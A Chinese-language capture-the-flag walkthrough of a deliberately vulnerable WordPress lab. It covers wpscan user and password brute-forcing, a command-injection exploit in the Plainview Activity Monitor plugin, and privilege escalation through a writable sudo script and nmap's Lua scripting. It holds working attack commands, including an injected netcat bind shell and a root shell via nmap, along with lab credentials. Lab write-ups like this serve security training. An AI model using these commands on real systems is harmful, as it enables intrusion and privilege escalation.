這是一個利用wordpress插件漏洞提權的一個靶場,感覺還行叭,前面作者也在題目中給足了思路,要用到rockyou字典,一看是wordpress,思路就是拿到該站點用 wpscan 得到用戶名,然後再用 wpscan 配合字典得到密碼,後面提權視具體情況而定
nmap -sn 192.168.67.99:獲取到目標地址 192.168.67.99
nmap -A -p- 192.168.67.99:獲取到目標地址系統信息及開放端口信息 22 80
既然給了 22 端口那麼極有可能會用到…
瀏覽器查看下http://192.168.67.99發現登陸不上去,頁面會跳轉到http://wordy,於是修改一下到 /etc/hosts 增添一條規則,將 192.168.67.99 解析到 http://wordy
再次打開 http://wordy 查看,這界面一看就是 wordpress 老規矩,wapplayzer 查看一下,是 wordpress 5.1.1 版本[新版本],根據題目提示[剛開始沒有看到提示,直接 cewl 收集了一波,然後 wpscan 查了下用戶名,rockyou 字典有點大…跑起來很費時]
一邊跑下有哪些有戶名,一邊把字典搞過來
wpscan --url http://wordy -e u
cp /usr/share/wordlists/rockyou.txt.gz /root/ --> 解壓,得到 rockyou.txt
cat rockyou.txt | grep k01 > pwd.txt
得到五個用戶名:admin mark graham sarah jens,保存到 name.txt
wpscan 跑密碼: wpscan --url http://wordy -U name.txt -P pwd.txt
得到 mark 的密碼: helpdesk01
嘗試 ssh 登陸,登陸失敗
於是 web 登陸,也沒看到有什麼東西可搞,wordpress 最常爆漏洞的地方就是插件了,那就枚舉一下該站都有哪些插件
wpscan --url http://wordy --plugins-detection aggressive
發現有兩個插件不是最新版本的,看看這兩個插件有無可利用的
searchsploit Plugin Plainview Activity
WordPress Plugin Plainview Activity Monitor 20161228 - (Auth | php/webapps/45274.html
cp /usr/share/exploitdb/exploit/php/webapps/45274.html /root/a.html
vim a.html修改
cp a.html /var/www/html/
service apache2 start
kali這邊:nc 192.168.67.99 9999
訪問 http://192.168.67.221/a.html,點擊 submit request 提交,頁面跳轉,但是沒有反應,提示 connection refused
那就嘗試提交一下
可看到命令正常執行,F12 修改一下max length,把 15 改成 1000,然後輸入
127.0.0.1|nc -vnlp 6666 -c /bin/bash
nc 192.168.67.99 6666 --> kali這邊接shell
成功拿到 shell,加個殼
python -c 'import pty;pty.spawn("/bin/bash")'
cd /home/mark
ls
cd stuff
cat things-to-do.txt
得到 graham 的密碼:
- Add new user: graham - GSo7isUM1D4 - done
ssh 登陸一波:
ssh [email protected]
yes
GSo7isUM1D4
ls --> 沒有東西
sudo -l --> 查看有無過權東西
有:/home/jens/backups.sh
既然該 shell 腳本可以以 jens 權限,那就寫點東西進去,
cat /home/jens/backups.sh
vi /home/jens/backups.sh
#!/bin/bash
/bin/bash
cat /home/jens/backups.sh
cd /home/jens
sudo -u jens ./backups.sh
這就來到了 jens 的環節:
ls
sudo -l:發現有 /usr/bin/nmap
衆所周知 nmap 可以啓用腳本:那執行個系統命令豈不可以拿到 root 權限?
echo 'os.execute("/bin/bash")' > SHELL -->注意引號的使用
sudo /usr/bin/nmap --script SHELL
id
ls /root/
cat /root/the/flag.txt
總結:
1.密碼破解2.漏洞利用3.提權4.細心5.簡單腳本